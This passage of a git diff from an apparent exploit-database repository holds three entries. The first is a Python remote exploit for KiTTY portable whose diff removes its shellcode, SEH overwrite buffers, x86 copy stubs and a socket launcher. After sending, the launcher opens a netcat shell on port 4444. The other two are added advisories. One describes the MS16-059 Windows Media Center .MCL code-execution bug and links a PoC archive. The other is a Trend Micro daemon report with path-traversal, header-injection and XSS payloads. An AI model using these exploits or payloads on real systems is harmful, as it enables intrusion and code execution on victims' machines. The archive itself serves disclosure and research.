-"\xec\x04\xc1\xaf\x4a\xdd\x9b\x69\x0f\x74\xe3\x4c\x1e\x3f\xa7"
-"\x2c\x5a\xa9\xf1\x3e\x58\xbf\xf1\x26\x58\xaf\xf4\x3e\x66\x80"
-"\x6b\x57\x88\x06\x72\xe1\xee\xb7\xf1\x2e\xf1\xc9\xcf\x60\x89"
-"\xe4\xc7\x97\xdb\x42\x57\xdd\xac\xaf\xcf\xce\x9b\x44\x3a\x97"
-"\xdb\xc5\xa1\x14\x04\x79\x5c\x88\x7b\xfc\x1c\x2f\x1d\x8b\xc8"
-"\x02\x0e\xaa\x58\xbd"
-)
-# ###############################################################################
-# ** Shellcode Slicer **
-# ###############################################################################
-# Slice our shellcode in as many parts as necessary
-count      = 1
-position   = 0
-remaining  = len(shellcode)
-slice      = []
-total_size = 0
-
-counter = 0
-while position < len(shellcode):
-        if remaining > (slice_size - 1):
-                slice.append(shellcode[position:slice_size*count])
-                position = slice_size * count
-                remaining = len(shellcode) - position
-                count += 1
-        else: # last slice
-                slice.append(shellcode[position:position+remaining] + '\x90' * (slice_size - remaining))
-                position = len(shellcode)
-                remaining = 0
-
-                # If shellcode size is less than 256 bytes (\xFF), two slices only are required. However the jump
-                # to shellcode being on 2 bytes, it would insert a NULL (e.g \xFE\x00). In this case we simply
-                # add a NOP slice to keep this shellcode slicer generic.
-                if len(shellcode) < 256:
-                        slice.append('\x90' * slice_size)
-                        total_size += slice_size
-
-        # Keep track of whole slices size, which may be greater than original shellcode size
-        # if padding is needed for the last slice. Will be used to calculate a jump size later
-        total_size += len(slice[counter])
-
-		
-# ###############################################################################
-# ** Buffer Builder **
-# ###############################################################################
-# Prepare as many buffers as we have shellcode slices
-seh     = '\x36\x31\x4B\x00'               				# 0x004B3136 / POP POP RET / kitty_portable.exe 0.65.0.2p
-#seh    = '\x43\x82\x4B\x00'                            # 0x004B8243 / POP POP RET / kitty_portable.exe 0.63.2.2p
-#seh    = '\x0B\x34\x49\x00'                            # 0x0049340B / POP POP RET / kitty_portable.exe 0.62.1.2p
-nseh    = '\x90' * 4            						# will be calculated later
-junk    = '\x41' * 58
-endmark = '\x43' * 5					   				# used to mark end of slice
-buffer  = []
-
-for index in range(len(slice)):
-        # Slice end marker, to stop copy once reached   # mov edi,0x4343XXXX
-        shellcode_end = '\xBF' + slice[index][slice_size-2:slice_size] + '\x43\x43'
-
-        shell_copy = ( # 51 bytes
-        # Calculate shellcode src & dst address
-        '\x8B\x5C\x24\x08'                              # mov ebx,[esp+8]       ; retrieve nseh address
-        )
-
-        if index < (len(slice) - 1):
-														# sub bl,0xB2           ; calculate shellcode position from nseh
-                shell_copy += '\x80\xEB' + struct.pack("<B", slice_size + len(endmark) + 51 + len(nseh))            
-        else: # last slice      
-														# sub bl,0xB1           ; calculate shellcode position from nseh
-                shell_copy += '\x80\xEB' + struct.pack("<B", slice_size + len(endmark) + 50 + len(nseh))            
-
-		# In this exploit we retrieve an address from the main process memory, using ECX. This will be used below to calculate
-        # shellcode destination. On other exploits, it may be necessary to use another register (or even to hardcode the address)
-        shell_copy += (
-        '\x89\xCE'                                      # mov esi,ecx           ; retrieve main process memory address
-        '\x31\xC9'                                      # xor ecx,ecx           ; will store the increment
-        )
-
-        # Calculate shellcode destination relative to memory address retrieved above. As we ADD an address having NULLs
-        # we store a non NULL address instead, that we SUB afterwards in the register itself
-        if index > 0:                                   # add esi,0x1117FED7 (+118 * x)
-                shell_copy += '\x81\xC6' + struct.pack("<I", relative_jump + (slice_size * index))
-        else: # first slice
-                shell_copy += '\x81\xC6' + struct.pack("<I", relative_jump)
-
-        shell_copy += (
-        '\x81\xEE\x22\x22\x22\x11'                      # sub esi,0x11222222    ; calculate shellcode destination
-        )
-
-        shell_copy += shellcode_end                     # mov edi,0x4343XXXX    ; shellcode end mark
-		
-		shell_copy += (
-        # Shellcode copy loop
-        '\x83\xC1\x04'                                  # add ecx, 0x4          ; increment counter
-        '\x83\xC6\x04'                                  # add esi, 0x4          ; increment destination
-        '\x8B\x14\x0B'                                  # mov edx,[ebx+ecx]     ; put shell chunk into edx
-        '\x89\x16'                                      # mov [esi],edx         ; copy shell chunk to destination
-        '\x39\xFA'                                      # cmp edx,edi           ; check if we reached shellcode end mark (if yes set ZF = 1)
-        '\x75\xF1'                                      # jne short -13         ; if ZF = 0, jump back to increment ecx
-        )
-
-        if index < (len(slice) - 1):
-                shell_copy += ( # infinite loop
-                '\x90\x90\x90\x90'                      # nop nop nop nop       ; infinite loop
-                '\xEB\xFA\x90\x90'                      # jmp short -0x4        ; infinite loop
-                )
-        else: # last slice
-                                                        # sub si,0x160          ; prepare jump address: sub len(slices)
-                shell_copy += '\x66\x81\xEE' + struct.pack("<H", total_size - 2)
-
-                shell_copy += (
-                '\x56'                                  # push esi              ; store full shellcode address on stack
-                '\xC3'                                  # ret                   ; jump to shellcode (we cannot us JMP or CALL as \xFF is a bad char)
-                )
-														# jmp short -len(shell_copy)
-		nseh    = '\xEB' + struct.pack("<B", 254 - len(shell_copy)) + '\x90\x90'
-        padding = '\x42' * (offset - len(slice[index]) - len(endmark) - len(shell_copy))
-		
-        buffer.append(junk + padding + slice[index] + endmark + shell_copy + nseh + seh)
-
-		
-# ###############################################################################
-# ** Slice Launcher **
-# ###############################################################################
-# Send all of our buffers to the target!
-sock = []
-print "[*] Connecting to %s" % host
-for index in range(len(buffer)):
-        sock.append(socket.socket(socket.AF_INET, socket.SOCK_STREAM))
-        try:
-                sock[index].connect((host, 1987))
-                time.sleep(1)
-                print "[*] Sending evil buffer%d... (slice %d/%d)" % (index+1, index+1, len(buffer))
-                sock[index].send(buffer[index])
-                time.sleep(1)
-                sock[index].close()
-                time.sleep(2)
-
-                if index == (len(buffer) - 1):
-                        if   netcat == "disabled":
-                                print "[*] Done."
-                        elif netcat == "local":
-                                print "\n[*] Waiting for our shell!"
-                                os.system("nc -nlvp 4444")
-                        elif netcat == "remote": # default
-                                print "\n[*] Connecting to our shell..."
-                                time.sleep(2)
-                                os.system("nc -nv " + host + " 4444")
-        except:
-                print "[-] Error sending buffer"
diff --git a/platforms/windows/remote/39805.txt b/platforms/windows/remote/39805.txt
new file mode 100755
index 000000000..360cf97c5
--- /dev/null
+++ b/platforms/windows/remote/39805.txt
@@ -0,0 +1,25 @@
+Exploit Title: Microsoft Windows Media Center .MCL File Processing Remote Code Execution Vulnerability (MS16-059)
+
+Date: May 11th, 2016
+
+Exploit Author: Eduardo Braun Prado
+
+Vendor Homepage : http://www.microsoft.com
+
+Version: All prior to May 10th, 2016 update.
+
+Tested on: Windows Media Center running on Microsoft Windows  Vista, 2008, 7, 8, 8.1
+
+CVE:  CVE-2016-0185
+
+Microsoft Windows Media Center (all versions prior to May 11th, 2016) contains a remote code execution upon processing specially crafted .MCL files. The vulnerability exists because Windows Media Center does not correctly processes paths in the "Run" parameter of the "Application" tag, bypassing the usual security warning displayed upon trying to run programs residing on remote (WebDAV/SMB) shares. In order to bypass the Windows Media Center security warning an attacker only needs to write the prefix "file:///" before the actual remote location. For example : file:///\\192.168.10.10\share\app.exe. However, Windows will still display an "Open File" security warning for files placed in remote locations (Internet Security Zone of IE), which can also be bypassed using a special "Control Panel Shortcut" that points to a remote DLL/CPL file. Upon pointing to a shortcut located in a remote share it is possible to run arbitrary code in the context of the currently logged on user. Note: On 64 bits Windows OSes, a 64-bits DLL should be provided, but 32-bits DLL files should work as well. A PoC MCL file is provided, which points to a default Windows share, to retrieve a special "Control Panel Shortcut", that runs a CPL file from the same location (\\127.0.0.1\c$\programdata\cpl.lnk). Notice that although the address points to the "Localhost", Windows treats it the same way as any other IP based location, placing it in the context of the IE "Internet Security Zone" (default for non-local places). The PoC CPL file only runs "cmd.exe /c calc" for demonstration purposes. Another important note is that after this Microsoft patch (May, 2016), the special "Control Panel Shortcut" does *NOT* work anymore.
+
+Link to PoC: https://onedrive.live.com/?id=AFCB9116C8C0AAF4%21201&cid=AFCB9116C8C0AAF4#id=AFCB9116C8C0AAF4%21319&cid=AFCB9116C8C0AAF4
+
+file is: "MS-Windows-Media-Center-May-2016-RCE-POC--Password-is-mcl.zip"
+Password: mcl
+
+EDB PoC Mirror:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39805.zip
+
+I am also attaching the file as "MS-Windows-Media-Center-May-2016-RCE-POC--Password-is-mcl[dot]zip.txt"  (extension is txt, but it is an actual .ZIP archive, so rename to ".ZIP" upon downloading it). Archive opens successfully on any Windows version.
\ No newline at end of file
diff --git a/platforms/windows/webapps/39808.txt b/platforms/windows/webapps/39808.txt
new file mode 100755
index 000000000..e8c655a5e
--- /dev/null
+++ b/platforms/windows/webapps/39808.txt
@@ -0,0 +1,32 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=775
+
+The main component of Trend Micro Antivirus is CoreServiceShell.exe, which runs as NT AUTHORITY\SYSTEM. 
+
+The CoreServiceShell includes an HTTP daemon, which is used for redirecting network content inspection among other things. For example, if you attempt to visit a blacklisted page, the request is redirected to http://localhost:37848/ and a warning page is displayed.
+
+There are multiple problems with this daemon, first of all, there's a trivial path traversal in the /loadhelp/ and /wtp/ endpoints. The daemon checks paths for "../..", but this doesn't work because you can just do "..\..", which is an entirely valid path separator on Windows.
+
+There's also some trivial header injection bugs, e.g:
+
+http://localhost:37848/continue/TiCredToken=29579&Source=&URL=%0aContent-Type:%20text/html%0aContent-Length:%2032%0a%0a<h1>hello</h1>
+
+By combining these two issues, you can remotely access files as SYSTEM on a Trend Micro machine.
+
+I happened to notice another problem, the file loader.html has an obvious XSS if the window is 10px wide. I know that's an odd condition, but an attacker can easily force that with something like
+
+<iframe width="26px" scrolling="no" src="http://localhost:37848/LocalHelp/loader?javascript:alert(1)">
+
+The code is like this:
+
+	var st = getStyle("a", "width");
+	
+	if (st == "10px") {
+		var queryString = window.location.search;
+		if (queryString.length > 0 && queryString.charAt(0) == "?") {
+			var url = queryString.substr(1);
+		}
+		window.location.href = url;
+        }
+
+I honestly have no idea what the author intended, but this bug can be used with the path traversal to access arbitrary local files, or even authenticated remote files by forcing them to be downloaded (<a href=foo download>.click())
+